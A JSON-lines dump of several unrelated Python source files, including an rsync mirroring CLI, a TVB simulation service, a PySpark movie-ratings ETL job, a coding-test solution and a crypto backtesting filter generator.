\"\n \"Use '-n' option to specify it.\")\n\n report = dict()\n exitcode = 0\n\n for server in servers:\n report[server] = dict()\n try:\n remote = rsync_mirror.TRsync(server, **properties)\n remote.push(source_url, snapshot_name, symlinks=symlinks)\n report[server]['success'] = True\n except Exception as e:\n report[server]['success'] = False\n report[server]['log'] = e.message\n exitcode = 1\n\n for srv, msg in report.items():\n if msg['success']:\n self.log.info('Push %s to %s: SUCCESS' % (source_url, srv))\n else:\n self.log.error('Push %s to %s: FAILED' % (source_url, srv))\n self.log.error(msg['log'])\n\n sys.exit(exitcode)\n\n\nclass SymlinkCmd(command.Command):\n log = logging.getLogger(__name__)\n\n def get_description(self):\n return \"Create (or update) symlinks on remote\"\n\n def get_parser(self, prog_name):\n parser = super(SymlinkCmd, self).get_parser(prog_name)\n parser.add_argument('-d', '--dest',\n nargs='+',\n required=True,\n help='Destination rsync url (local, rsyncd, '\n 'remote shell).')\n parser.add_argument('-t', '--target',\n required=True,\n help='All the symlinks will target to (relative '\n 'symlink name). Url by default.')\n parser.add_argument('-s', '--symlinks',\n nargs='+',\n required=True,\n default=[],\n help='Update specified symlinks (names relative '\n 'dest).')\n parser.add_argument('--update',\n action='store_true',\n required=False,\n default=False,\n help='It specified, all existent symlinks will be '\n 'updated. Will be skiped otherwise. Disabled by '\n 'default.')\n parser.add_argument('--extra',\n required=False,\n default='',\n help='String with additional rsync parameters. '\n 'For example it may be \"\\--dry-run '\n '--any-rsync-option\".Use \"\\\\\" to disable '\n 'argparse to parse extra value.')\n\n return parser\n\n def take_action(self, parsed_args):\n properties = vars(parsed_args)\n symlinks = properties.pop('symlinks', [])\n for symlink in symlinks:\n if symlink.startswith('/') or symlink.startswith('../'):\n self.log.error('Symlink name outside the root url: %s',\n symlink)\n raise RuntimeError('Symlink name the root url: {}'\n ''.format(symlink))\n servers = properties.pop('dest', None)\n target = properties.pop('target', None)\n if properties['extra'].startswith('\\\\'):\n properties['extra'] = properties['extra'][1:]\n properties['rsync_extra_params'] = properties.pop('extra')\n update = properties.pop('update', None)\n\n report = dict()\n exitcode = 0\n\n for server in servers:\n report[server] = dict()\n try:\n remote = rsync_ops.RsyncOps(server, **properties)\n for symlink in symlinks:\n remote.symlink(symlink, target, update=update)\n report[server]['success'] = True\n except Exception as e:\n report[server]['success'] = False\n report[server]['log'] = e.message\n exitcode = 1\n\n for srv, msg in report.items():\n if msg['success']:\n self.log.info('Creating symlinks %s targeted to %s on %s: '\n 'SUCCESS' % (str(symlinks), target, srv))\n else:\n self.log.error('Creating symlinks %s targeted to %s on %s: '\n 'FAILED' % (str(symlinks), target, srv))\n self.log.error(msg['log'])\n\n sys.exit(exitcode)\n\n\nclass RemoveCmd(command.Command):\n log = logging.getLogger(__name__)\n\n def get_description(self):\n return \"remove all specified paths from several DST recursively\"\n\n def get_parser(self, prog_name):\n parser = super(RemoveCmd, self).get_parser(prog_name)\n\n parser.add_argument('path',\n nargs='+',\n help='Path to remove')\n parser.add_argument('-d', '--dest',\n nargs='+',\n required=True,\n help='Destination rsync 
url')\n parser.add_argument('--extra',\n required=False,\n default='',\n help='String with additional rsync parameters. '\n 'For example it may be \"\\--dry-run '\n '--any-rsync-option\". Use \"\\\\\" to disable '\n 'argparse to parse extra value.')\n return parser\n\n def take_action(self, parsed_args):\n properties = vars(parsed_args)\n servers = properties.pop('dest', None)\n path = properties.pop('path', None)\n if properties['extra'].startswith('\\\\'):\n properties['extra'] = properties['extra'][1:]\n properties['rsync_extra_params'] = properties.pop('extra')\n\n report = dict()\n exitcode = 0\n for server in servers:\n report[server] = dict()\n self.log.info(\"Removing items {}\".format(str(path)))\n try:\n remote = rsync_ops.RsyncOps(server, **properties)\n remote.rm_all(path)\n report[server]['success'] = True\n except Exception as e:\n report[server]['success'] = False\n report[server]['log'] = e.message\n exitcode = 1\n\n for srv, msg in report.items():\n if msg['success']:\n self.log.info('Remove %s: SUCCESS' % (path))\n else:\n self.log.error('Remove %s: FAILED' % (path))\n\n sys.exit(exitcode)\n\n\nclass GetTargetCmd(command.Command):\n log = logging.getLogger(__name__)\n\n def get_description(self):\n return \"Evaluate the target for specified symlink \"\\\n \"(optional recursively)\"\n\n def get_parser(self, prog_name):\n parser = super(GetTargetCmd, self).get_parser(prog_name)\n\n parser.add_argument('symlink_url',\n help='Symlink url to resolve (supported by rsync)')\n parser.add_argument('-r', '--recursive',\n action='store_true',\n required=False,\n default=False,\n help='It specified, the symlink will be resolved '\n 'recursively (if the symlink targeted to other '\n 'symlinks tree - they will be resolved too). '\n 'Disabled by default.')\n return parser\n\n def take_action(self, parsed_args):\n properties = vars(parsed_args)\n symlink_url = properties.pop('symlink_url', None)\n recursive = properties.pop('recursive', False)\n\n url = rsync_url.RsyncUrl(symlink_url)\n remote = rsync_ops.RsyncOps(url.root, **properties)\n target = remote.symlink_target(url.path, recursive=recursive)\n print(target)\n\n\nclass TRsyncApp(app.App):\n log = logging.getLogger(__name__)\n\n def __init__(self):\n super(TRsyncApp, self).__init__(\n description='TRsync',\n version=trsync.__version__,\n command_manager=commandmanager.CommandManager('trsync'),\n deferred_help=True,\n )\n\n\ndef main(argv=sys.argv[1:]):\n app = TRsyncApp()\n return app.run(argv)\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"mrasskazov/trsync","sub_path":"trsync/cmd/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":13480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6670116850","text":"from datetime import datetime\nfrom tvb.basic.logger.builder import get_logger\nfrom tvb.core.entities.file.files_helper import FilesHelper\nfrom tvb.core.entities.model.model_datatype import DataTypeGroup\nfrom tvb.core.entities.model.simulator.burst_configuration import BurstConfiguration2\nfrom tvb.core.entities.storage import dao\nfrom tvb.core.utils import format_bytes_human, format_timedelta\n\nMAX_BURSTS_DISPLAYED = 50\n\nclass BurstService2(object):\n\n def __init__(self):\n self.logger = get_logger(self.__class__.__module__)\n self.file_helper = FilesHelper()\n\n def mark_burst_finished(self, burst_entity, burst_status=None, error_message=None):\n \"\"\"\n Mark Burst status field.\n Also compute 'weight' for current 
burst: no of operations inside, estimate time on disk...\n\n :param burst_entity: BurstConfiguration to be updated, at finish time.\n :param burst_status: BurstConfiguration status. By default BURST_FINISHED\n :param error_message: If given, set the status to error and perpetuate the message.\n \"\"\"\n if burst_status is None:\n burst_status = BurstConfiguration2.BURST_FINISHED\n if error_message is not None:\n burst_status = BurstConfiguration2.BURST_ERROR\n\n try:\n ### If there are any DataType Groups in current Burst, update their counter.\n burst_dt_groups = dao.get_generic_entity(DataTypeGroup, burst_entity.id, \"fk_parent_burst\")\n for dt_group in burst_dt_groups:\n dt_group.count_results = dao.count_datatypes_in_group(dt_group.id)\n dt_group.disk_size, dt_group.subject = dao.get_summary_for_group(dt_group.id)\n dao.store_entity(dt_group)\n\n ### Update actual Burst entity fields\n burst_entity.datatypes_number = dao.count_datatypes_in_burst(burst_entity.id)\n\n burst_entity.status = burst_status\n burst_entity.error_message = error_message\n burst_entity.finish_time = datetime.now()\n dao.store_entity(burst_entity)\n except Exception:\n self.logger.exception(\"Could not correctly update Burst status and meta-data!\")\n burst_entity.status = burst_status\n burst_entity.error_message = \"Error when updating Burst Status\"\n burst_entity.finish_time = datetime.now()\n dao.store_entity(burst_entity)\n\n def persist_operation_state(self, operation, operation_status, message=None):\n \"\"\"\n Update Operation instance state. Store it in DB and on HDD/\n :param operation: Operation instance\n :param operation_status: new status\n :param message: message in case of error\n :return: operation instance changed\n \"\"\"\n operation.mark_complete(operation_status, message)\n dao.store_entity(operation)\n operation = dao.get_operation_by_id(operation.id)\n self.file_helper.write_operation_metadata(operation)\n return operation\n\n def get_burst_for_operation_id(self, operation_id):\n return dao.get_burst_for_operation_id(operation_id)\n\n @staticmethod\n def rename_burst(burst_id, new_name):\n \"\"\"\n Rename the burst given by burst_id, setting it's new name to\n burst_name.\n \"\"\"\n burst = dao.get_burst_by_id(burst_id)\n burst.name = new_name\n dao.store_entity(burst)\n\n @staticmethod\n def get_available_bursts(project_id):\n \"\"\"\n Return all the burst for the current project.\n \"\"\"\n bursts = dao.get_bursts_for_project(project_id, page_size=MAX_BURSTS_DISPLAYED) or []\n # for burst in bursts:\n # burst.prepare_after_load()\n return bursts\n\n @staticmethod\n def populate_burst_disk_usage(bursts):\n \"\"\"\n Adds a disk_usage field to each burst object.\n The disk usage is computed as the sum of the datatypes generated by a burst\n \"\"\"\n sizes = dao.compute_bursts_disk_size([b.id for b in bursts])\n for b in bursts:\n b.disk_size = format_bytes_human(sizes[b.id])\n\n def update_history_status(self, id_list):\n \"\"\"\n For each burst_id received in the id_list read new status from DB and return a list [id, new_status] pair.\n \"\"\"\n result = []\n for b_id in id_list:\n burst = dao.get_burst_by_id(b_id)\n # burst.prepare_after_load()\n if burst is not None:\n if burst.status == burst.BURST_RUNNING:\n running_time = datetime.now() - burst.start_time\n else:\n running_time = burst.finish_time - burst.start_time\n running_time = format_timedelta(running_time, most_significant2=False)\n\n if burst.status == burst.BURST_ERROR:\n msg = 'Check Operations page for error Message'\n 
else:\n msg = ''\n result.append([burst.id, burst.status, burst.is_group, msg, running_time])\n else:\n self.logger.debug(\"Could not find burst with id=\" + str(b_id) + \". Might have been deleted by user!!\")\n return result\n","repo_name":"maedoc/tvb-root","sub_path":"framework_tvb/tvb/core/services/burst_service2.py","file_name":"burst_service2.py","file_ext":"py","file_size_in_byte":5204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"34831129762","text":"\r\n# Library and external modules declaration\r\nfrom pyspark.sql.window import Window\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.functions import *\r\nfrom pyspark.sql.types import *\r\nfrom conf.config import CleanConfigurations\r\nimport pyspark\r\nimport logging\r\n\r\nlogging.getLogger(\"py4j\").setLevel(logging.INFO)\r\nlogging.basicConfig(format='[%(asctime)s] - %(levelname)s - %(message)s')\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.DEBUG)\r\n\r\nclass ETLJob(object):\r\n def main(self):\r\n \"\"\"\r\n This function is used for performing transformation operations.\r\n \"\"\"\r\n # Reading Movies data\r\n movies_df = self.read_source_data(CleanConfigurations.MOVIES_FILE_PATH, CleanConfigurations.MOVIES_FILE_EXTENSION, CleanConfigurations.MOVIES_SCHEMA, \r\n CleanConfigurations.MOVIES_HEADER, CleanConfigurations.MOVIES_DELIMITER)\r\n logger.info(\"Movies file data read completed\")\r\n \r\n # Reading Ratings data\r\n ratings_df = self.read_source_data(CleanConfigurations.RATINGS_FILE_PATH, CleanConfigurations.RATINGS_FILE_EXTENSION, CleanConfigurations.RATINGS_SCHEMA, \r\n CleanConfigurations.RATINGS_HEADER, CleanConfigurations.RATINGS_DELIMITER)\r\n logger.info(\"Ratings file data read completed\")\r\n\r\n # Getting Min, Max and Average for each movie\r\n output_df= self.joined_data(movies_df, ratings_df)\r\n\r\n # Getting top 3 movies based on their rating\r\n top_3_movies_df = self.top_3_movies_data(movies_df, ratings_df)\r\n\r\n # Writing data\r\n self.write_output_data(output_df,CleanConfigurations.TASK2_OUTPUT_PATH)\r\n self.write_output_data(top_3_movies_df,CleanConfigurations.TASK3_OUTPUT_PATH)\r\n\r\n def read_source_data(self, path, file_extension, final_struc, header, delimiter):\r\n \"\"\"\r\n This function is used to read data with mutiple options.\r\n \"\"\"\r\n if file_extension == 'csv' or file_extension == 'txt' or file_extension == 'dat':\r\n input_df = spark.read.csv(path, header=header, sep=delimiter, schema=final_struc)\r\n elif file_extension == 'parquet':\r\n # input_df = spark.read.parquet(path, schema=final_struc)\r\n input_df = spark.read.schema(final_struc).parquet(path)\r\n elif file_extension == 'json':\r\n input_df = spark.read.json(path, multiLine=True, schema=final_struc)\r\n else:\r\n raise Exception(\"File Format Not Supported\")\r\n return input_df\r\n \r\n def joined_data(self, movies_df, ratings_df):\r\n \"\"\"\r\n Getting max, min and average rating for each movie from ratimgs data \r\n \"\"\"\r\n # Getting Min, Max and Average for each movie\r\n grouped_ratings_df = ratings_df.groupBy(\"MovieID\").agg(expr(\"max(Rating)\").alias(\"MaxRating\"),\r\n expr(\"min(Rating)\").alias(\"MinRating\"),\r\n expr(\"avg(Rating)\").alias(\"AverageRating\"))\r\n\r\n # Joining movies data with ratings data\r\n joined_df = movies_df.join(grouped_ratings_df, movies_df.MovieID == grouped_ratings_df.MovieID).drop(grouped_ratings_df.MovieID)\r\n return joined_df\r\n \r\n def top_3_movies_data(self, movies_df, 
ratings_df):\r\n \"\"\"\r\n Getting top 3 movies based on their rating\r\n \"\"\"\r\n # Getting top 3 movies rated by each user\r\n w = Window.partitionBy(\"UserID\").orderBy(col(\"Rating\").desc())\r\n combined_df = ratings_df.join(movies_df, movies_df.MovieID == ratings_df.MovieID,'leftouter').drop(movies_df.MovieID)\r\n combined_rank_df = combined_df.withColumn(\"rank\",row_number().over(w))\r\n top_3_movies_df = combined_rank_df.filter(combined_rank_df.rank <= 3).drop(\"rank\")\r\n return top_3_movies_df\r\n \r\n def write_output_data(self, df, path):\r\n \"\"\"\r\n This function is used to write data at specified output location.\r\n \"\"\"\r\n df.coalesce(1).write.mode(\"overwrite\").parquet(path)\r\n logger.info(\"Parquet file created in directory: {}\".format(path))\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n application_name = \"movies-app\"\r\n logger.info(\"Application - {} started\".format(application_name))\r\n spark_conf = CleanConfigurations.SPARK_CONF.get('CONF', [])\r\n if spark_conf:\r\n logger.info(\"SparkSession getting created with custom spark configuration\")\r\n conf = pyspark.SparkConf().setAll(spark_conf)\r\n spark = SparkSession.builder.appName(application_name) \\\r\n .config(conf=conf) \\\r\n .enableHiveSupport() \\\r\n .master(\"local[*]\")\\\r\n .getOrCreate()\r\n else:\r\n logger.info(\"SparkSession getting created with default spark configuration\")\r\n spark = SparkSession.builder.appName(application_name) \\\r\n .enableHiveSupport() \\\r\n .master(\"local[*]\")\\\r\n .getOrCreate()\r\n ETLJob().main()\r\n spark.stop()\r\n except Exception as e:\r\n logger.error(\"Failed while performing ETL job with error - \" + str(e))\r\n raise e\r\n\r\n","repo_name":"khedikar/newday-movies-app","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11800476716","text":"# Week 5, company K: pillar and beam installation\ndef solution(n, build_frame):\n \n answer = []\n\n def possible(x, y, a):\n if a == 0: # pillar constraints\n if y == 0 or [x, y - 1, 0] in answer or [x - 1, y, 1] in answer or [x, y, 1] in answer:\n return True # possible\n return False # not possible\n \n else: # beam constraints\n if [x, y - 1, 0] in answer or [x + 1, y - 1, 0] in answer or ([x - 1, y, 1] in answer and [x + 1, y, 1] in answer):\n return True # possible\n return False # not possible\n \n for f in build_frame:\n if f[3] == 1 and possible(f[0], f[1], f[2]): # if installation is possible\n answer.append([f[0], f[1], f[2]]) # install\n elif f[3] == 0: # on deletion\n answer.remove([f[0], f[1], f[2]]) # delete first\n for a in answer:\n if possible(a[0], a[1], a[2]) is False: # check constraints for the remaining elements\n answer.append([f[0], f[1], f[2]]) # revert if not possible\n break\n \n answer.sort()\n return answer","repo_name":"zzarbttoo/TMT","sub_path":"HI/20200729_k_5.py","file_name":"20200729_k_5.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30443131668","text":"import os\nimport sys\nimport enum\nfrom loguru import logger as log\n\n_ = os.path.abspath(os.path.dirname(__file__)) # return the current file path\nroot_path = os.path.abspath(os.path.join(_, '../')) # return the root directory\nsys.path.append(root_path)\n\nfrom config import root_path,output_path\nfrom utils import tools, ind, reader\nfrom environ import RankAscending, FilterAfter, cdn_num_ls\n# from src_backtesting.config import root_path\n# from src_backtesting.utils import reader, tools, ind\n\nimport math\nimport platform\nimport 
warnings\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport datetime\nfrom joblib import Parallel, delayed\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tc\n\nwarnings.filterwarnings(\"ignore\")\n\nfrom typing import Union, List\nmin_qty_path = os.path.join(_, '���小下单量.csv')\nrtn_data_path = os.path.join(output_path,'中性回放结果')\n\neps = 1e-8\n\ndef load_playCfg(playCfg):\n return playCfg['c_rate'][0], playCfg['hold_hour_num'][0], playCfg['long_coin_num'][0], playCfg['short_coin_num'][0], playCfg[\n 'long_p'][0], playCfg['short_p'][0], playCfg['leverage'][0], playCfg['long_risk_position'][0], playCfg['initial_trade_usdt'][0], playCfg['offset_stop_win'][0], playCfg['offset_stop_loss'][0]\n\n\ndef load_othCfg(othCfg):\n return othCfg['log_level'], othCfg['cal_factor_type'], othCfg['hourly_details'], othCfg['select_by_hour'], othCfg['filter_before_exec'], othCfg['filter_after_exec'], othCfg[\n 'start_date'], othCfg['end_date'], othCfg['factor_long_list'], othCfg['factor_short_list'], othCfg['trade_type'], othCfg['compound_name'], \\\n othCfg['quit_symbol_filter_hour'], othCfg['p_signal_fun'], othCfg['select_offsets'], othCfg['white_list'], othCfg['black_list']\n\n\ndef filter_generate(direction: str = 'long', filter_factor: str = '涨跌幅max_fl_24', filter_type: str = 'value',\n compare_operator: str = 'lt', filter_value: Union[int, float, List[Union[int, float]]] = 0.2,\n rank_ascending: bool = False, filter_after: bool = False, weight_ratio: float = 0, param: list = None) -> str:\n \"\"\"\n : param direction: 过滤的方向 '多'/'long'/'df1'或 '空'/'short'/'df2'\n : param filter_factor: 过滤因子名 如 '涨跌幅max_fl_24'\n : param filter_type: 过滤方式 value/rank/pct 原始数值/排名(默认从大到小)/百分位(从小到大)\n : param filter_value: 过滤阈值 支持 int float list\n : param compare_operator: 和数值的比较关系 lt gt bt nbt lte gte bte nbte eq ne\n : param rank_ascending: True/False 控制 rank模式下的排名方向,对pct无效\n : param filter_after: False/True 是否为后置过滤\n : param weight_ratio: 被后置的币设定资金系数 0 即是清仓\n : param inclusive: True 闭区间 ; Flase 开区间\n : param param: [direction,filter_factor,filter_type,filter_value,compare_operator,rank_ascending,filter_after,weight_ratio] 的前5到8个元素 便于链式过滤传参\n : param compare_operator 详解:\n lt, gt, lte, gte, bt, bte, nbt, nbte 是一些缩写,它们在数学和计算机科学中有特定的含义。\n lt 是 less than 的缩写,表示“小于”。\n gt 是 greater than 的缩写,表示“大于”。\n lte 是 less than or equal to 的缩写,表示“小于等于”。\n gte 是 greater than or equal to 的缩写,表示“大于等于”。\n bt 是 between 的缩写,表示“介于两者之间”。\n bte 是 between, inclusive 的缩写,表示“介于两者之间,包括两者”。\n nbt 是 not between 的缩写,表示“不介于两者之间”。\n nbte 是 not between, inclusive 的缩写,表示“不介于两者之间,但包括两者”。\n eq 是 equal 的缩写,表示“等于”\n ne 是 not equal 的缩写,表示“不等于”\n \"\"\"\n # 生成过滤行为组件\n def _str_generate(param: list = None) -> tuple:\n if len(param) < 5:\n raise ValueError('Wrong param length!')\n else:\n direction, filter_factor, filter_type, compare_operator, filter_value, rank_ascending, filter_after, \\\n weight_ratio = param + [False, False, 0][len(param) - 5:3]\n cdn_map = {'df1': 0, 'df2': 1}\n direction_map = {'多': 'df1', 'long': 'df1', 'df1': 'df1',\n '空': 'df2', 'short': 'df2', 'df2': 'df2'}\n dfx = direction_map.get(direction)\n\n if dfx is None:\n raise ValueError('Wrong direction!')\n\n assert filter_type in ['value', 'rank', 'pct']\n assert compare_operator in ['lt', 'lte', 'gt', 'gte', 'bt', 'bte', 'nbt', 'nbte', 'eq', 'ne']\n assert type(filter_factor) == str\n if rank_ascending in RankAscending.__members__.values():\n rank_ascending = rank_ascending.value\n if 
filter_after in FilterAfter.__members__.values():\n filter_after = filter_after.value\n assert rank_ascending in [True, False]\n assert filter_after in [True, False]\n if compare_operator == 'eq':\n assert type(filter_value) in [float, int]\n compare_operator = 'bte'\n filter_value = [filter_value, filter_value]\n elif compare_operator == 'ne':\n assert type(filter_value) in [float, int]\n compare_operator = 'nbt'\n filter_value = [filter_value, filter_value]\n if compare_operator.endswith('e'):\n inclusive = True\n else:\n inclusive = False\n if filter_type == 'pct': rank_ascending = True\n use_pct = None\n if compare_operator in ['lt', 'lte', 'gt', 'gte']:\n if filter_type == 'rank':\n assert type(filter_value) == int\n use_pct = False\n elif filter_type == 'pct':\n assert 0 <= filter_value <= 1\n use_pct = True\n else:\n assert type(filter_value) in [float, int]\n else:\n assert type(filter_value) == list\n assert filter_value[0] <= filter_value[1]\n if filter_type == 'rank':\n assert type(filter_value[0]) == int\n assert type(filter_value[1]) == int\n use_pct = False\n elif filter_type == 'pct':\n assert 0 <= filter_value[0] <= 1\n assert 0 <= filter_value[1] <= 1\n use_pct = True\n if type(filter_value) != list:\n if compare_operator in ['lt', 'lte']:\n filter_value = [-1e100, filter_value]\n elif compare_operator in ['gt', 'gte']:\n filter_value = [filter_value, 1e100]\n if compare_operator[:2] == 'nb':\n inclusive = not inclusive\n reverse = '~'\n else:\n reverse = ''\n if filter_type == 'value':\n rank_str = f\"filter_factor = ['{filter_factor}'][0]\"\n else:\n rank_str = f\"{dfx}[f'{filter_factor}_rank'] = {dfx}.groupby('candle_begin_time')['{filter_factor}'].rank(method='first', pct={use_pct}, ascending={rank_ascending})\"\n filter_factor = f'{filter_factor}_rank'\n left, right = filter_value\n pre_fix = 'long_' if dfx == 'df1' else 'short_'\n map_ad = 0 if not filter_after else 2\n num = cdn_num_ls[cdn_map[dfx] + map_ad]\n condition_str = f\"{pre_fix}condition{num} = {reverse}{dfx}[f'{filter_factor}'].between({left},{right},inclusive={inclusive})\"\n cdn_num_ls[cdn_map[dfx] + map_ad] += 1\n\n return rank_str, condition_str, dfx, num, weight_ratio\n # 数字映射,解决计数替换重码\n chinese_digit = '零 一二三四五六七八九'\n digit_map = {str(i): v for i, v in enumerate(chinese_digit)}\n # 组件构装\n if param is None:\n param = direction, filter_factor, filter_type, compare_operator, filter_value, rank_ascending, filter_after, weight_ratio\n if type(param) == list:\n filter_after = False if len(param) < 7 else param[6]\n if rank_ascending in RankAscending.__members__.values():\n rank_ascending = rank_ascending.value\n if filter_after in FilterAfter.__members__.values():\n filter_after = filter_after.value\n try:\n rank_str, condition_str, dfx, num, weight_ratio = _str_generate(param)\n except Exception as e:\n print('出错参数:', param)\n raise e\n pre_fix = 'long_' if dfx == 'df1' else 'short_'\n if not filter_after:\n filter_str = f\"{dfx} = {dfx}.loc[{pre_fix}condition{num}]\"\n else:\n filter_str = f\"{dfx}.loc[{pre_fix}condition{num},'weight_ratio'] = {weight_ratio}\"\n filter_str = f\"\"\"{rank_str}\\n{condition_str}\\n{filter_str}\"\"\"\n return filter_str\n elif type(param) == tuple:\n *params_list, logical_operators = param\n param = params_list[0]\n filter_after = False if len(param) < 7 else param[6]\n if filter_after in FilterAfter.__members__.values():\n filter_after = filter_after.value\n assert type(logical_operators) == str\n filter_res_list = []\n for x in params_list:\n try:\n 
filter_res_list.append(_str_generate(x))\n except Exception as e:\n print('出错参数:', x)\n raise e\n if len(set([x[2] for x in filter_res_list])) != 1: raise ValueError('df1 与 df2 不能进行逻辑运算')\n ref = filter_res_list[0][3] - 1\n for i in range(10):\n logical_operators = logical_operators.replace(str(i), digit_map[str(i)])\n for i, filter_res in enumerate(filter_res_list[::-1]):\n i = len(filter_res_list) - i - 1\n dfx, num, weight_ratio = filter_res[2:]\n pre_fix = 'long_' if dfx == 'df1' else 'short_'\n raw_digit = digit_map[str(i+1)]\n target_digit = str(i+1+ref)\n logical_operators = logical_operators.replace(raw_digit, f'{pre_fix}condition{target_digit}')\n if not filter_after:\n filter_str = f\"{dfx} = {dfx}.loc[{logical_operators}]\"\n else:\n if len(set([x[4] for x in filter_res_list])) != 1: raise ValueError('后置过滤与或并运算,要求weight_ratio一致')\n filter_str = f\"{dfx}.loc[{logical_operators},'weight_ratio'] = {weight_ratio}\"\n filter_strs = []\n [filter_strs.extend(x[:2]) for x in filter_res_list]\n filter_strs += [filter_str]\n filter_str = '\\n'.join(filter_strs)\n return f\"\"\"{filter_str}\"\"\"\n\ndef parallel_filter_handle(filter_before_exec):\n '''\n 将默认的串联过滤转化为并联过滤,只使用于filter_generate生成的过滤逻辑,后置过滤不适用,默认并联\n '''\n series_filter_list = []\n for content in filter_before_exec:\n series_filter_list += content.split('\\n')\n define_strs_list = [x for x in series_filter_list if 'loc' not in x]\n filter_strs_list = [x for x in series_filter_list if 'loc' in x]\n parallel_filter_list = define_strs_list + filter_strs_list\n return parallel_filter_list, 'between'\n\n\ndef np_select_by_hour(run_time, hold_hour_num, long_coin_num, short_coin_num, arr_data, quit_blacK_symbol_list):\n arr_list_long, arr_list_short, long_weight_array, short_weight_array = arr_data\n ll = []\n # log.info(quit_blacK_symbol_list)\n for temp in arr_list_long[run_time:hold_hour_num + run_time]:\n temp = temp.copy()\n if quit_blacK_symbol_list:\n raw_len = len(temp)\n for quit_symbol in quit_blacK_symbol_list:\n temp = temp[temp[:, 1] != quit_symbol]\n temp[:, 5] = temp[:, 5].argsort().argsort() + 1\n ll.append(temp[np.where(temp[:, 5] <= long_coin_num)])\n select_coin_long = np.vstack(ll)\n\n ll = []\n for temp in arr_list_short[run_time:hold_hour_num + run_time]:\n temp = temp.copy()\n if quit_blacK_symbol_list:\n for quit_symbol in quit_blacK_symbol_list:\n temp = temp[temp[:, 1] != quit_symbol]\n temp[:, 5] = (-temp[:, 5]).argsort().argsort() + 1\n ll.append(temp[np.where(temp[:, 5] <= short_coin_num)])\n select_coin_short = np.vstack(ll)\n for rank, w in enumerate(long_weight_array):\n select_coin_long[:, 3] = np.where(select_coin_long[:, 5] == rank + 1, w, select_coin_long[:, 3])\n for rank, w in enumerate(short_weight_array):\n select_coin_short[:, 3] = np.where(select_coin_short[:, 5] == rank + 1, w, select_coin_short[:, 3])\n\n select_coin_long[:, 3] = select_coin_long[:, 3] * select_coin_long[:, 6]\n select_coin_short[:, 3] = select_coin_short[:, 3] * select_coin_short[:, 6]\n return select_coin_long[:, 1:5], select_coin_short[:, 1:5]\n\n\ndef get_select_data(playCfg, run_time, all_trade_usdt, arr_data, quit_blacK_symbol_list, cache_data=[]):\n c_rate, hold_hour_num, long_coin_num, short_coin_num, long_p, short_p, leverage, long_risk_position, initial_trade_usdt, offset_stop_win, offset_stop_loss = load_playCfg(playCfg)\n\n if len(arr_data) > 0:\n # 实时从交易所拿数据计算因子即实现仿盘功能\n select_long_, select_short_ = np_select_by_hour(run_time, hold_hour_num, long_coin_num, short_coin_num, arr_data, quit_blacK_symbol_list)\n 
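# no live factor data supplied: fall back to the precomputed selection cache (pure backtest path)\n 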
else:\n select_long, select_short = cache_data\n select_long_ = select_long[(run_time) * long_coin_num:(run_time + hold_hour_num) * long_coin_num]\n select_short_ = select_short[(run_time) * short_coin_num:(run_time + hold_hour_num) * short_coin_num]\n # 计算多头风险暴露后的 资金分配\n select_long_[:, 3] = all_trade_usdt / hold_hour_num / 2 * select_long_[:, 2] * (1 + long_risk_position)\n select_short_[:, 3] = all_trade_usdt / hold_hour_num / 2 * select_short_[:, 2] * (1 - long_risk_position)\n return select_long_, select_short_\n\n\ndef trade_symbol_info(run_time, all_trade_usdt, symbol_info, select_long_, select_short_, min_qtys, open_prices,\n close_prices, c_rate):\n next_run_time = run_time + 1\n # 计算实际下单量\n target_amount_long = select_long_[:, 3] / select_long_[:, 1]\n target_amount_short = -select_short_[:, 3] / select_short_[:, 1]\n\n for i in range(select_long_.shape[0]):\n symbol = int(select_long_[i, 0])\n symbol_info[symbol, 2] += target_amount_long[i]\n for i in range(select_short_.shape[0]):\n symbol = int(select_short_[i, 0])\n symbol_info[symbol, 2] += target_amount_short[i]\n\n symbol_info[:, 3] = symbol_info[:, 2] - symbol_info[:, 0]\n # 下单量精度修正\n for symbol in range(symbol_info.shape[0]):\n min_qty = min_qtys[symbol]\n symbol_info[symbol, 3] = np.round(symbol_info[symbol, 3] * (10 ** min_qty)) / (10 ** min_qty)\n symbol_info[:, 11] = close_prices[run_time]\n symbol_info[:, 5] = symbol_info[:, 3] * symbol_info[:, 11]\n # 处理小于5 和reduce_only 问题\n symbol_info[:, 3] = np.where((np.abs(symbol_info[:, 5]) < 5) & (symbol_info[:, 2] != 0), 0, symbol_info[:, 3])\n symbol_info[:, 5] = symbol_info[:, 3] * symbol_info[:, 11]\n\n # K线开始,交易对持仓账户影响\n symbol_info[:, 4] = open_prices[run_time]\n symbol_info[:, 3] = np.where(np.isnan(symbol_info[:, 3]), 0, symbol_info[:, 3])\n symbol_info[:, 4] = np.where(np.isnan(symbol_info[:, 4]), 0, symbol_info[:, 4])\n symbol_info[:, 6] = symbol_info[:, 4] * np.abs(symbol_info[:, 3]) * c_rate\n symbol_info[:, 7] = np.where(symbol_info[:, 0] > symbol_info[:, 3], symbol_info[:, 3], symbol_info[:, 0])\n\n symbol_info[:, 7] = np.where(np.sign(symbol_info[:, 0]) == np.sign(symbol_info[:, 3]), 0,\n np.where(np.abs(symbol_info[:, 0]) > np.abs(symbol_info[:, 3]), symbol_info[:, 3],\n symbol_info[:, 0]))\n\n symbol_info[:, 8] = symbol_info[:, 0] + symbol_info[:, 3]\n\n symbol_info[:, 9] = np.abs(symbol_info[:, 7]) * (symbol_info[:, 4] - symbol_info[:, 1]) * np.sign(symbol_info[:, 0])\n\n symbol_info[:, 10] = np.where(symbol_info[:, 7] == 0,\n (symbol_info[:, 1] * symbol_info[:, 0] + symbol_info[:, 3] * symbol_info[:, 4]) / (\n symbol_info[:, 0] + symbol_info[:, 3]),\n 